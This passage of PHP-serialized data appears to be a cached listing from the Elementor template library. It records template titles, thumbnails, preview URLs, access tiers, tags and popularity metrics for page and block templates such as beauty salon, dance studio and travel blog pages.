Salon\",\"Hair\"]\";s:10:\"menu_order\";i:68;s:16:\"popularity_index\";i:548;s:11:\"trend_index\";i:101;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:342;a:21:{s:4:\"tmpl\";i:1180;s:2:\"id\";i:18340;s:5:\"title\";s:30:\"Restaurant &#8211; Coming Soon\";s:9:\"thumbnail\";s:98:\"https://library.elementor.com/wp-content/uploads/2021/03/Library-Pic-Restuarant-Coming-Soon-LP.png\";s:12:\"tmpl_created\";i:1614772183;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/lp/restaurant-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:51:\"[\"Coming Soon\",\"Food\",\"Landing Pages\",\"Restaurant\"]\";s:10:\"menu_order\";i:68;s:16:\"popularity_index\";i:810;s:11:\"trend_index\";i:809;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:343;a:21:{s:4:\"tmpl\";i:499;s:2:\"id\";i:5413;s:5:\"title\";s:8:\"About 21\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_2.png\";s:12:\"tmpl_created\";i:1520443507;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-21/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:68;s:16:\"popularity_index\";i:83;s:11:\"trend_index\";i:52;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:344;a:21:{s:4:\"tmpl\";i:1126;s:2:\"id\";i:16496;s:5:\"title\";s:28:\"Beauty Salon &#8211; Gallery\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/12/gallery-1.jpg\";s:12:\"tmpl_created\";i:1608622379;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/beauty-salon-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:23:\"[\"Beauty Salon\",\"Hair\"]\";s:10:\"menu_order\";i:69;s:16:\"popularity_index\";i:491;s:11:\"trend_index\";i:90;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:345;a:21:{s:4:\"tmpl\";i:1173;s:2:\"id\";i:17480;s:5:\"title\";s:42:\"At-home Massage Therapist &#8211; Business\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2021/02/At-Home-Massage-Therapist.jpg\";s:12:\"tmpl_created\";i:1612879264;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/lp/at-home-massage-therapist-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:60:\"[\"Business\",\"Health\",\"Landing Pages\",\"Services\",\"Therapist\"]\";s:10:\"menu_order\";i:69;s:16:\"popularity_index\";i:856;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:346;a:21:{s:4:\"tmpl\";i:1127;s:2:\"id\";i:16457;s:5:\"title\";s:25:\"Beauty Salon &#8211; Home\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/12/home-1.jpg\";s:12:\"tmpl_created\";i:1608622383;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/beauty-salon-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:23:\"[\"Beauty Salon\",\"Hair\"]\";s:10:\"menu_order\";i:70;s:16:\"popularity_index\";i:408;s:11:\"trend_index\";i:56;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:347;a:21:{s:4:\"tmpl\";i:1178;s:2:\"id\";i:18317;s:5:\"title\";s:26:\"Insurance &#8211; Business\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2021/03/Library-Pic-Life-Insirance.png\";s:12:\"tmpl_created\";i:1614769488;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/lp/insurance-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:61:\"[\"Business\",\"Family\",\"Financial\",\"Insurance\",\"Landing Pages\"]\";s:10:\"menu_order\";i:70;s:16:\"popularity_index\";i:870;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:348;a:21:{s:4:\"tmpl\";i:1128;s:2:\"id\";i:16518;s:5:\"title\";s:29:\"Beauty Salon &#8211; Services\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/12/services-1.jpg\";s:12:\"tmpl_created\";i:1608622386;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/beauty-salon-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:23:\"[\"Beauty Salon\",\"Hair\"]\";s:10:\"menu_order\";i:71;s:16:\"popularity_index\";i:664;s:11:\"trend_index\";i:261;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:349;a:21:{s:4:\"tmpl\";i:1168;s:2:\"id\";i:17401;s:5:\"title\";s:40:\"Conference Thank You Page &#8211; Events\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2021/02/250x280.png\";s:12:\"tmpl_created\";i:1612724753;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/lp/conference-thank-you-page-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:14:\"Thank You Page\";s:4:\"tags\";s:59:\"[\"Conference\",\"Event\",\"Events\",\"Landing Pages\",\"Thank You\"]\";s:10:\"menu_order\";i:71;s:16:\"popularity_index\";i:799;s:11:\"trend_index\";i:540;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:350;a:21:{s:4:\"tmpl\";i:503;s:2:\"id\";i:5447;s:5:\"title\";s:7:\"About 3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_5.png\";s:12:\"tmpl_created\";i:1520443514;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/about-3-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:71;s:16:\"popularity_index\";i:48;s:11:\"trend_index\";i:12;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:351;a:21:{s:4:\"tmpl\";i:1073;s:2:\"id\";i:15486;s:5:\"title\";s:25:\"Travel Blog &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/11/About.jpg\";s:12:\"tmpl_created\";i:1606215720;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/travel-blog-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:72;s:16:\"popularity_index\";i:608;s:11:\"trend_index\";i:343;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:352;a:21:{s:4:\"tmpl\";i:1166;s:2:\"id\";i:17368;s:5:\"title\";s:38:\"Real Estate Agency &#8211; Real-Estate\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/02/Library-Pic-Real-Estate.png\";s:12:\"tmpl_created\";i:1612711814;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/lp/real-estate-agency-real-estate/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"Real Estate\";s:4:\"tags\";s:73:\"[\"Landing Pages\",\"listing\",\"Real estate\",\"Realestate\",\"realtor\",\"realty\"]\";s:10:\"menu_order\";i:72;s:16:\"popularity_index\";i:858;s:11:\"trend_index\";i:777;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:353;a:21:{s:4:\"tmpl\";i:1074;s:2:\"id\";i:15478;s:5:\"title\";s:27:\"Travel Blog &#8211; Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/11/Contact-Us.jpg\";s:12:\"tmpl_created\";i:1606215735;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/travel-blog-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:73;s:16:\"popularity_index\";i:687;s:11:\"trend_index\";i:564;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:354;a:21:{s:4:\"tmpl\";i:1170;s:2:\"id\";i:17423;s:5:\"title\";s:57:\"Volunteer Calls Thank You Page &#8211; Social Involvement\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2021/02/Volunteer-Calls-TYP.jpg\";s:12:\"tmpl_created\";i:1612726058;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:151:\"https://library.elementor.com/lp/volunteer-calls-thank-you-page-social-involvement/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Thank You Page\";s:4:\"tags\";s:62:\"[\"Care\",\"Involvement\",\"Landing Pages\",\"Thank You\",\"Volunteer\"]\";s:10:\"menu_order\";i:73;s:16:\"popularity_index\";i:857;s:11:\"trend_index\";i:818;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:355;a:21:{s:4:\"tmpl\";i:507;s:2:\"id\";i:5480;s:5:\"title\";s:7:\"About 4\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_7-1.png\";s:12:\"tmpl_created\";i:1520443522;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/about-4-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:73;s:16:\"popularity_index\";i:428;s:11:\"trend_index\";i:303;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:356;a:21:{s:4:\"tmpl\";i:1075;s:2:\"id\";i:15467;s:5:\"title\";s:24:\"Travel Blog &#8211; Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/11/Home.jpg\";s:12:\"tmpl_created\";i:1606215756;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/travel-blog-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:74;s:16:\"popularity_index\";i:567;s:11:\"trend_index\";i:224;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:357;a:21:{s:4:\"tmpl\";i:1169;s:2:\"id\";i:17409;s:5:\"title\";s:37:\"Webinar Thank You Page &#8211; Events\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/02/Library-Pic-Webinar-TYP.png\";s:12:\"tmpl_created\";i:1612725644;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/lp/webinar-thank-you-page-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Thank You Page\";s:4:\"tags\";s:56:\"[\"Event\",\"Events\",\"Landing Pages\",\"Thank You\",\"Webinar\"]\";s:10:\"menu_order\";i:74;s:16:\"popularity_index\";i:868;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:358;a:21:{s:4:\"tmpl\";i:1056;s:2:\"id\";i:15317;s:5:\"title\";s:25:\"Dance Studio &#8211; Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/10/Home.jpg\";s:12:\"tmpl_created\";i:1603181291;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/dance-studio-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:16:\"[\"Dance Studio\"]\";s:10:\"menu_order\";i:75;s:16:\"popularity_index\";i:596;s:11:\"trend_index\";i:301;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:359;a:21:{s:4:\"tmpl\";i:545;s:2:\"id\";i:6027;s:5:\"title\";s:7:\"About 5\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_1-1.png\";s:12:\"tmpl_created\";i:1520443639;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/about-5-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:75;s:16:\"popularity_index\";i:40;s:11:\"trend_index\";i:40;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:360;a:21:{s:4:\"tmpl\";i:1160;s:2:\"id\";i:17258;s:5:\"title\";s:32:\"Beauty Product &#8211; eCommerce\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2021/01/Beauty-Product.png\";s:12:\"tmpl_created\";i:1610903153;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/beauty-product-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:38:\"[\"Beauty\",\"Ecommerce\",\"Landing Pages\"]\";s:10:\"menu_order\";i:75;s:16:\"popularity_index\";i:797;s:11:\"trend_index\";i:703;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:361;a:21:{s:4:\"tmpl\";i:1057;s:2:\"id\";i:15334;s:5:\"title\";s:26:\"Dance Studio &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/10/About.jpg\";s:12:\"tmpl_created\";i:1603181364;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/dance-studio-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:16:\"[\"Dance Studio\"]\";s:10:\"menu_order\";i:76;s:16:\"popularity_index\";i:626;s:11:\"trend_index\";i:373;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:362;a:21:{s:4:\"tmpl\";i:546;s:2:\"id\";i:6036;s:5:\"title\";s:7:\"About 6\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_1-1.png\";s:12:\"tmpl_created\";i:1520443641;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/about-6-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:76;s:16:\"popularity_index\";i:90;s:11:\"trend_index\";i:123;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:363;a:21:{s:4:\"tmpl\";i:1171;s:2:\"id\";i:17435;s:5:\"title\";s:39:\"Gym &#8211; App Service &#8211; Product\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/02/250x280-4.png\";s:12:\"tmpl_created\";i:1612726462;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/lp/gym-app-service-product/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:7:\"Product\";s:4:\"tags\";s:58:\"[\"App\",\"Fitness\",\"Gym\",\"Health\",\"Landing Pages\",\"Product\"]\";s:10:\"menu_order\";i:76;s:16:\"popularity_index\";i:767;s:11:\"trend_index\";i:577;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:364;a:21:{s:4:\"tmpl\";i:1058;s:2:\"id\";i:15349;s:5:\"title\";s:28:\"Dance Studio &#8211; Classes\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/10/Classes.jpg\";s:12:\"tmpl_created\";i:1603181425;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/dance-studio-classes/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:16:\"[\"Dance Studio\"]\";s:10:\"menu_order\";i:77;s:16:\"popularity_index\";i:629;s:11:\"trend_index\";i:458;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:365;a:21:{s:4:\"tmpl\";i:1156;s:2:\"id\";i:17111;s:5:\"title\";s:33:\"Sunglasses Sale &#8211; eCommerce\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2021/01/Sunglasses-LP-Library-Pic.jpg\";s:12:\"tmpl_created\";i:1610632408;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/sunglasses-sale-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:59:\"[\"Ecommerce\",\"Fashion\",\"Landing Pages\",\"Sale\",\"Sunglasses\"]\";s:10:\"menu_order\";i:77;s:16:\"popularity_index\";i:812;s:11:\"trend_index\";i:732;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:366;a:21:{s:4:\"tmpl\";i:1055;s:2:\"id\";i:15366;s:5:\"title\";s:29:\"Dance Studio &#8211; Schedule\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2020/10/Classes-Schedule.jpg\";s:12:\"tmpl_created\";i:1603181056;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/dance-studio-schedule/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:16:\"[\"Dance Studio\"]\";s:10:\"menu_order\";i:78;s:16:\"popularity_index\";i:698;s:11:\"trend_index\";i:602;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:367;a:21:{s:4:\"tmpl\";i:1157;s:2:\"id\";i:17223;s:5:\"title\";s:25:\"Fashion &#8211; eCommerce\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2021/01/Commerce-Fashion.png\";s:12:\"tmpl_created\";i:1610902553;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/lp/fashion-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:29:\"[\"Ecommerce\",\"Landing Pages\"]\";s:10:\"menu_order\";i:78;s:16:\"popularity_index\";i:808;s:11:\"trend_index\";i:745;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:368;a:21:{s:4:\"tmpl\";i:1059;s:2:\"id\";i:15373;s:5:\"title\";s:28:\"Dance Studio &#8211; Pricing\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/10/Pricing.jpg\";s:12:\"tmpl_created\";i:1603181678;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/dance-studio-pricing/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:16:\"[\"Dance 